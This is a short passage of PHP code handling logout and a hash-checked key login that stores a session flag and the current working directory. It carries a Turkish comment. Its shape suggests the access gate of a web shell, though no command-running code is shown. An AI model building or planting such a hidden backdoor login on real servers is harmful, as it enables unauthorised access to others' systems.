'destroyed'])); } if (isset($_GET['logout'])) { session_destroy(); header('Location: '.strtok($_SERVER['REQUEST_URI'], '?')); exit; } if (!isset($_SESSION['nebula_auth'])) { if (isset($_POST['k']) && hash('sha256', $_POST['k']) === $auth_hash) { $_SESSION['nebula_auth'] = true; $_SESSION['cwd'] = getcwd(); } else { // Login ekranı çıktısı için buffer temizle ob_end_clean(); die('